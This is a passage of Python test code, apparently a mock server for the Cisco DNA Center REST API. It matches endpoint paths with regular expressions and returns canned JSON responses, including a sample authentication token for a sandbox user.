COMMAND_RUNNER_33bb2b9d40199e14_PATTERN = re.compile(r"/dna/intent/api/v1/network-device-poller/cli/legit-reads")
COMMAND_RUNNER_d6b8ca774739adf4_PATTERN = re.compile(r"/dna/intent/api/v1/network-device-poller/cli/read-request")
FILE_3f89bbfc4f6b8b50_PATTERN = re.compile(r"/dna/intent/api/v1/file/namespace")
FILE_42b6a86e44b8bdfc_PATTERN = re.compile(r"/dna/intent/api/v1/file/namespace/string")
FILE_9698c8ec4a0b8c1a_PATTERN = re.compile(r"/dna/intent/api/v1/file/string")
PATH_TRACE_55bc3bf94e38b6ff_PATTERN = re.compile(r"/dna/intent/api/v1/flow-analysis")
PATH_TRACE_7ab9a8bd4f3b86a4_PATTERN = re.compile(r"/dna/intent/api/v1/flow-analysis/string")
PATH_TRACE_8a9d2b76443b914e_PATTERN = re.compile(r"/dna/intent/api/v1/flow-analysis/string")
PATH_TRACE_a395fae644ca899c_PATTERN = re.compile(r"/dna/intent/api/v1/flow-analysis")
NON_FABRIC_WIRELESS_07913b7f4e1880de_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/provision")
NON_FABRIC_WIRELESS_20872aec43b9bf50_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/profile")
NON_FABRIC_WIRELESS_6896993e41b8bd7a_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/profile")
NON_FABRIC_WIRELESS_a0be3a2f47ab9f3c_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/provision")
NON_FABRIC_WIRELESS_ae86a8c14b5980b7_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/profile/string")
NON_FABRIC_WIRELESS_47ba59204e0ab742_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/profile")
NON_FABRIC_WIRELESS_db9f997f4e59aec1_PATTERN = re.compile(r"/dna/intent/api/v1/business/ssid")
NON_FABRIC_WIRELESS_c7a6592b4b98a369_PATTERN = re.compile(r"/dna/intent/api/v1/enterprise-ssid/string")
NON_FABRIC_WIRELESS_cca098344a489dfa_PATTERN = re.compile(r"/dna/intent/api/v1/business/ssid/string/string")
NON_FABRIC_WIRELESS_cca519ba45ebb423_PATTERN = re.compile(r"/dna/intent/api/v1/enterprise-ssid")
NON_FABRIC_WIRELESS_8a96fb954d09a349_PATTERN = re.compile(r"/dna/intent/api/v1/enterprise-ssid")
FABRIC_WIRED_1e80bb50430b8634_PATTERN = re.compile(r"/dna/intent/api/v1/business/sda/border-device/string")
FABRIC_WIRED_a4b56a5f478a97dd_PATTERN = re.compile(r"/dna/intent/api/v1/business/sda/border-device")
FABRIC_WIRED_d0b3593c4a7aaf22_PATTERN = re.compile(r"/dna/intent/api/v1/business/sda/border-device/string")
DEVICES_0db7da744c0b83d8_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/module/string")
DEVICES_1c894b5848eab214_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string")
DEVICES_3b9ef9674429be4c_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/sync")
DEVICES_20b19b52464b8972_PATTERN = re.compile(r"/dna/intent/api/v1/network-device")
DEVICES_288df9494f2a9746_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/vlan")
DEVICES_38bd0b884b89a785_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/collection-schedule/global")
DEVICES_349c888443b89a58_PATTERN = re.compile(r"/dna/intent/api/v1/interface/network-device/string/0/0")
DEVICES_3d923b184dc9a4ca_PATTERN = re.compile(r"/dna/intent/api/v1/interface/count")
DEVICES_4bb22af046fa8f08_PATTERN = re.compile(r"/dna/intent/api/v1/network-device")
DEVICES_4eb56a614cc9a2d2_PATTERN = re.compile(r"/dna/intent/api/v1/interface/network-device/string/interface-name")
DEVICES_5b8639224cd88ea7_PATTERN = re.compile(r"/dna/intent/api/v1/interface/network-device/string/count")
DEVICES_5db21b8e43fab7d8_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/count")
DEVICES_70ad397649e9b4d3_PATTERN = re.compile(r"/dna/intent/api/v1/interface/ospf")
DEVICES_82918a1b4d289c5c_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/collection-schedule")
DEVICES_84b37ae54c59ab28_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/meraki-organization")
DEVICES_81bb4804405a8d2f_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/functional-capability/string")
DEVICES_84ad8b0e42cab48a_PATTERN = re.compile(r"/dna/intent/api/v1/interface/isis")
DEVICES_84b33a9e480abcaf_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/config")
DEVICES_819f9aa54feab7bf_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/brief")
DEVICES_8fa8eb404a4a8d96_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string")
DEVICES_ba9dc85b4b8a9a17_PATTERN = re.compile(r"/dna/intent/api/v1/interface/network-device/string")
DEVICES_c9809b6744f8a502_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/tenantinfo/macaddress")
DEVICES_b9855ad54ae98156_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/brief")
DEVICES_b7bcaa084e2b90d0_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/config")
DEVICES_cd98780f4888a66d_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/file")
DEVICES_cd8469e647caab0e_PATTERN = re.compile(r"/dna/intent/api/v1/interface/ip-address/string")
DEVICES_d0a4b88145aabb51_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/ip-address/string")
DEVICES_888f585c49b88441_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/config/count")
DEVICES_d888ab6d4d59a8c1_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/serial-number/string")
DEVICES_f5947a4c439a8bf0_PATTERN = re.compile(r"/dna/intent/api/v1/interface")
DEVICES_8db939744649a782_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/module/count")
DEVICES_eb8249e34f69b0f1_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/module")
DEVICES_f6826a8e41bba242_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/wireless-info")
DEVICES_aeb9eb67460b92df_PATTERN = re.compile(r"/dna/intent/api/v1/network-device")
DEVICES_b888792d43baba46_PATTERN = re.compile(r"/dna/intent/api/v1/interface/string")
DEVICES_c3b3c9ef4e6b8a09_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/functional-capability")
DEVICES_89b2fb144f5bb09b_PATTERN = re.compile(r"/dna/intent/api/v1/device-detail")
DEVICES_f49548c54be8a3e2_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/0/0")
DEVICES_ffa748cc44e9a437_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/autocomplete")
SITES_17a82ac94cf99ab0_PATTERN = re.compile(r"/dna/intent/api/v1/site-health")
SITES_33aab9b842388023_PATTERN = re.compile(r"/dna/intent/api/v1/site/string")
SITES_23896b124bd8b9bf_PATTERN = re.compile(r"/dna/intent/api/v1/site")
SITES_209509d247599e19_PATTERN = re.compile(r"/dna/intent/api/v1/site")
SITES_92acda91406aa050_PATTERN = re.compile(r"/dna/intent/api/v1/site/string")
SITES_d9bdb9034df99dba_PATTERN = re.compile(r"/dna/intent/api/v1/site/count")
SITES_eeb168eb41988e07_PATTERN = re.compile(r"/dna/system/api/v1/site/string/device")
SITES_eba669054e08a60e_PATTERN = re.compile(r"/dna/intent/api/v1/membership")
NETWORKS_6284db4649aa8d31_PATTERN = re.compile(r"/dna/intent/api/v1/topology/vlan/vlan-names")
NETWORKS_9ba14a9e441b8a60_PATTERN = re.compile(r"/dna/intent/api/v1/topology/site-topology")
NETWORKS_b2b8cb91459aa58f_PATTERN = re.compile(r"/dna/intent/api/v1/topology/physical-topology")
NETWORKS_b9b48ac8463a8aba_PATTERN = re.compile(r"/dna/intent/api/v1/topology/l2/string")
NETWORKS_c2b5fb764d888375_PATTERN = re.compile(r"/dna/intent/api/v1/topology/l3/string")
NETWORKS_ca91da84401abba1_PATTERN = re.compile(r"/dna/intent/api/v1/network-health")
CLIENTS_149aa93b4ddb80dd_PATTERN = re.compile(r"/dna/intent/api/v1/client-health")
CLIENTS_e2adba7943bab3e9_PATTERN = re.compile(r"/dna/intent/api/v1/client-detail")
PNP_0b836b7b4b6a9fd5_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/unclaim")
PNP_0a9c988445cb91c8_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/sacct/string/vacct/string/sync-result")
PNP_09b0f9ce4239ae10_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/string")
PNP_2499e9ad42e8ae5b_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings/vacct")
PNP_1e962af345b8b59f_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings/savacct")
PNP_21a6db2540298f55_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/import")
PNP_3086c9624f498b85_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow/string")
PNP_3cb24acb486b89d2_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings/sacct")
PNP_5889fb844939a13b_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/site-claim")
PNP_6f9819e84178870c_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings/savacct")
PNP_7989f86846faaf99_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow/count")
PNP_70a479a6462a9496_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings/sacct/string/vacct")
PNP_7e92f9eb46db8320_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings")
PNP_8da0391947088a5a_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings")
PNP_848b5a7b4f9b8c12_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow")
PNP_a4b6c87a4ffb9efa_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/vacct-sync")
PNP_9e857b5a4a0bbcdb_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/reset")
PNP_af8d7b0e470b8ae2_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow/string")
PNP_cdab9b474899ae06_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/string")
PNP_aeb4dad04a99bbe3_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow")
PNP_bab6c9e5440885cc_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/string")
PNP_d9a1fa9c4068b23c_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/count")
PNP_80acb88e4ac9ac6d_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow/string")
PNP_f09319674049a7d4_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/history")
PNP_e6b3db8046c99654_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device")
PNP_cf9418234d9ab37e_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/site-config-preview")
PNP_f3b26b5544cabab9_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device")
PNP_d8a619974a8a8c48_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/claim")
SWIM_0c8f7a0b49b9aedd_PATTERN = re.compile(r"/dna/intent/api/v1/image/importation")
SWIM_8cb6783b4faba1f4_PATTERN = re.compile(r"/dna/intent/api/v1/image/distribution")
SWIM_4dbe3bc743a891bc_PATTERN = re.compile(r"/dna/intent/api/v1/image/importation/source/file")
SWIM_fb9beb664f2aba4c_PATTERN = re.compile(r"/dna/intent/api/v1/image/activation/device")
SWIM_bc8aab4746ca883d_PATTERN = re.compile(r"/dna/intent/api/v1/image/importation/source/url")
SITE_PROFILE_7fbe4b804879baa4_PATTERN = re.compile(r"/dna/intent/api/v1/business/nfv/provisioningDetail")
SITE_PROFILE_828828f44f28bd0d_PATTERN = re.compile(r"/dna/intent/api/v1/business/nfv")
SITE_PROFILE_2f97e8fa45f8b2a3_PATTERN = re.compile(r"/dna/intent/api/v1/nfv-provision-detail")
def matches_AUTHENTICATION_ac8ae94c4e69a09d(self):
return re.search(
self.AUTHENTICATION_ac8ae94c4e69a09d_PATTERN,
self.path
)
def authentication_authentication_response(self):
    """Reply 200 with a canned JSON authentication token payload."""
    # Status line and headers.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Serialized JSON body.
    body = json.dumps({"Token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiI1ZWNmZDViMjc1MTYxMjAwY2M1NzI3ZGEiLCJhdXRoU291cmNlIjoiaW50ZXJuYWwiLCJ0ZW5hbnROYW1lIjoiVE5UMCIsInJvbGVzIjpbIjVlNWE0MzI2NzUxNjEyMDBjYzRhYzk2MyJdLCJ0ZW5hbnRJZCI6IjVlNWE0MzI1NzUxNjEyMDBjYzRhYzk1YyIsImV4cCI6MTU5NDM1NTA1NCwiaWF0IjoxNTk0MzUxNDU0LCJqdGkiOiJkYjdhODcyZC1mNzI3LTRhODUtOWU1NC00YzM4NzM0YmFjMDkiLCJ1c2VybmFtZSI6ImRldm5ldHVzZXIifQ.WuKZUPJZgqZeKCG9UZ_C22Up1Yp7CKbImjmc9Is0xEuiy2TsB07Jl7Ov__oabNhuM2KjQyrj7k62zaopg7GyC3JGkpU7-vhYdy2c1aIBLoeeEYKOJocEE-ImUeVtFqo3md3lzMVn9hdfwQkyIuU_GwXHrDrxXY9umHKiWm9aGuP1VgRpqJKxTTsHF2iLQjmgVNHon4qqBv3McjlDNZ5nBVUzvO143xQ0ztHjebFrGGBogCt4hTVbqTdaFLowW6ovdA2qt6gktjr709gkZUkxLfa5Ntbt7DjQ-HmSTZmZHIItf2RVx9P3ENvr9RQFAQ5nWCr-rMeXceyWKr9uj75Oeg"})
    self.wfile.write(body.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_00aec9b1422ab27e(self):
return re.search(
self.TEMPLATE_PROGRAMMER_00aec9b1422ab27e_PATTERN,
self.path
)
def template_programmer_create_project_response(self):
    """Reply 200 with a canned create-project task payload."""
    # Status line and headers.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Serialized JSON body.
    body = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_01b09a254b9ab259(self):
return re.search(
self.TEMPLATE_PROGRAMMER_01b09a254b9ab259_PATTERN,
self.path
)
def template_programmer_getsthetemplatesavailable_response(self):
    """Reply 200 with an empty JSON object (templates-available payload)."""
    # Status line and headers.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Serialized JSON body.
    body = json.dumps({})
    self.wfile.write(body.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_109d1b4f4289aecd(self):
return re.search(
self.TEMPLATE_PROGRAMMER_109d1b4f4289aecd_PATTERN,
self.path
)
def template_programmer_get_projects_response(self):
    """Reply 200 with a canned list of projects and their templates."""
    # Status line and headers.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Serialized JSON body.
    body = json.dumps([{'name': 'string', 'id': 'string', 'templates': [{'name': 'string', 'composite': True, 'id': 'string'}]}])
    self.wfile.write(body.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_6099da82477b858a(self):
return re.search(
self.TEMPLATE_PROGRAMMER_6099da82477b858a_PATTERN,
self.path
)
def template_programmer_deploy_template_response(self):
    """Write a canned 200 JSON mock reply for the deploy-template endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'deploymentId': 'string', 'deploymentName': 'string', 'devices': [{'deviceId': 'string', 'duration': 'string', 'endTime': 'string', 'ipAddress': 'string', 'name': 'string', 'startTime': 'string', 'status': 'string'}], 'duration': 'string', 'endTime': 'string', 'projectName': 'string', 'startTime': 'string', 'status': 'string', 'templateName': 'string', 'templateVersion': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_7781fa0548a98342(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TEMPLATE_PROGRAMMER_7781fa0548a98342_PATTERN, self.path)
def template_programmer_update_template_response(self):
    """Write a canned 200 JSON mock reply for the update-template endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_9480fa1f47ca9254(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TEMPLATE_PROGRAMMER_9480fa1f47ca9254_PATTERN, self.path)
def template_programmer_update_project_response(self):
    """Write a canned 200 JSON mock reply for the update-project endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_a7b42836408a8e74(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TEMPLATE_PROGRAMMER_a7b42836408a8e74_PATTERN, self.path)
def template_programmer_delete_template_response(self):
    """Write a canned 200 JSON mock reply for the delete-template endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_f393abe84989bb48(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TEMPLATE_PROGRAMMER_f393abe84989bb48_PATTERN, self.path)
def template_programmer_preview_template_response(self):
    """Write a canned 200 JSON mock reply for the preview-template endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'cliPreview': 'string', 'templateId': 'string', 'validationErrors': {}})
    self.wfile.write(payload.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_c8bf6b65414a9bc7(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TEMPLATE_PROGRAMMER_c8bf6b65414a9bc7_PATTERN, self.path)
def template_programmer_get_template_versions_response(self):
    """Write a canned 200 JSON mock reply for the get-template-versions endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps([{'name': 'string', 'projectName': 'string', 'projectId': 'string', 'templateId': 'string', 'versionsInfo': [{'id': 'string', 'description': 'string', 'versionTime': 0}], 'composite': True}])
    self.wfile.write(payload.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_62b05b2c40a9b216(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TEMPLATE_PROGRAMMER_62b05b2c40a9b216_PATTERN, self.path)
def template_programmer_version_template_response(self):
    """Write a canned 200 JSON mock reply for the version-template endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_83a3b9404cb88787(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TEMPLATE_PROGRAMMER_83a3b9404cb88787_PATTERN, self.path)
def template_programmer_get_template_details_response(self):
    """Write a canned 200 JSON mock reply for the get-template-details endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'author': 'string', 'composite': True, 'containingTemplates': [{'composite': True, 'id': 'string', 'name': 'string', 'version': 'string'}], 'createTime': 0, 'description': 'string', 'deviceTypes': [{'productFamily': 'string', 'productSeries': 'string', 'productType': 'string'}], 'failurePolicy': 'ABORT_ON_ERROR', 'id': 'string', 'lastUpdateTime': 0, 'name': 'string', 'parentTemplateId': 'string', 'projectId': 'string', 'projectName': 'string', 'rollbackTemplateContent': 'string', 'rollbackTemplateParams': [{'binding': 'string', 'dataType': 'STRING', 'defaultValue': 'string', 'description': 'string', 'displayName': 'string', 'group': 'string', 'id': 'string', 'instructionText': 'string', 'key': 'string', 'notParam': True, 'order': 0, 'paramArray': True, 'parameterName': 'string', 'provider': 'string', 'range': [{'id': 'string', 'maxValue': 0, 'minValue': 0}], 'required': True, 'selection': {'id': 'string', 'selectionType': 'SINGLE_SELECT', 'selectionValues': {}}}], 'softwareType': 'string', 'softwareVariant': 'string', 'softwareVersion': 'string', 'tags': ['string'], 'templateContent': 'string', 'templateParams': [{'binding': 'string', 'dataType': 'STRING', 'defaultValue': 'string', 'description': 'string', 'displayName': 'string', 'group': 'string', 'id': 'string', 'instructionText': 'string', 'key': 'string', 'notParam': True, 'order': 0, 'paramArray': True, 'parameterName': 'string', 'provider': 'string', 'range': [{'id': 'string', 'maxValue': 0, 'minValue': 0}], 'required': True, 'selection': {'id': 'string', 'selectionType': 'SINGLE_SELECT', 'selectionValues': {}}}], 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_f6b119ad4d4aaf16(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TEMPLATE_PROGRAMMER_f6b119ad4d4aaf16_PATTERN, self.path)
def template_programmer_create_template_response(self):
    """Write a canned 200 JSON mock reply for the create-template endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_9c9a785741cbb41f(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TEMPLATE_PROGRAMMER_9c9a785741cbb41f_PATTERN, self.path)
def template_programmer_get_templatedeploymentstatus_response(self):
    """Write a canned 200 JSON mock reply for the get-template-deployment-status endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'deploymentId': 'string', 'deploymentName': 'string', 'devices': [{'deviceId': 'string', 'duration': 'string', 'endTime': 'string', 'ipAddress': 'string', 'name': 'string', 'startTime': 'string', 'status': 'string'}], 'duration': 'string', 'endTime': 'string', 'projectName': 'string', 'startTime': 'string', 'status': 'string', 'templateName': 'string', 'templateVersion': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_TEMPLATE_PROGRAMMER_d0a1abfa435b841d(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TEMPLATE_PROGRAMMER_d0a1abfa435b841d_PATTERN, self.path)
def template_programmer_delete_project_response(self):
    """Write a canned 200 JSON mock reply for the delete-project endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_00a2fa6146089317(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_00a2fa6146089317_PATTERN, self.path)
def tag_addmemberstothetag_response(self):
    """Write a canned 200 JSON mock reply for the add-members-to-tag endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_1399891c42a8be64(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_1399891c42a8be64_PATTERN, self.path)
def tag_create_tag_response(self):
    """Write a canned 200 JSON mock reply for the create-tag endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_429c28154bdaa13d(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_429c28154bdaa13d_PATTERN, self.path)
def tag_delete_tag_response(self):
    """Write a canned 200 JSON mock reply for the delete-tag endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_2e9db85840fbb1cf(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_2e9db85840fbb1cf_PATTERN, self.path)
def tag_get_tag_membercount_response(self):
    """Write a canned 200 JSON mock reply for the get-tag-member-count endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': 0})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_4695090d403b8eaa(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_4695090d403b8eaa_PATTERN, self.path)
def tag_get_tagresourcetypes_response(self):
    """Write a canned 200 JSON mock reply for the get-tag-resource-types endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': ['string']})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_45bc7a8344a8bc1e(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_45bc7a8344a8bc1e_PATTERN, self.path)
def tag_updatestagmembership_response(self):
    """Write a canned 200 JSON mock reply for the update-tag-membership endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_4d86a993469a9da9(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_4d86a993469a9da9_PATTERN, self.path)
def tag_update_tag_response(self):
    """Write a canned 200 JSON mock reply for the update-tag endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_8091a9b84bfba53b(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_8091a9b84bfba53b_PATTERN, self.path)
def tag_get_tag_count_response(self):
    """Write a canned 200 JSON mock reply for the get-tag-count endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': 0})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_c1a359b14c89b573(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_c1a359b14c89b573_PATTERN, self.path)
def tag_get_tagby_id_response(self):
    """Write a canned 200 JSON mock reply for the get-tag-by-id endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': {'systemTag': True, 'description': 'string', 'dynamicRules': [{'memberType': 'string', 'rules': {'values': ['string'], 'items': ['string'], 'operation': 'string', 'name': 'string', 'value': 'string'}}], 'name': 'string', 'id': 'string', 'instanceTenantId': 'string'}})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_eab7abe048fb99ad(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_eab7abe048fb99ad_PATTERN, self.path)
def tag_get_tagmembersby_id_response(self):
    """Write a canned 200 JSON mock reply for the get-tag-members-by-id endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': [{'instanceUuid': 'string'}]})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_caa3ea704d78b37e(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_caa3ea704d78b37e_PATTERN, self.path)
def tag_remove_tagmember_response(self):
    """Write a canned 200 JSON mock reply for the remove-tag-member endpoint."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
    self.wfile.write(payload.encode('utf-8'))
def matches_TAG_ee9aab01487a8896(self):
    """Return the re.Match (or None) of this endpoint's URL pattern against the request path."""
    return re.search(self.TAG_ee9aab01487a8896_PATTERN, self.path)
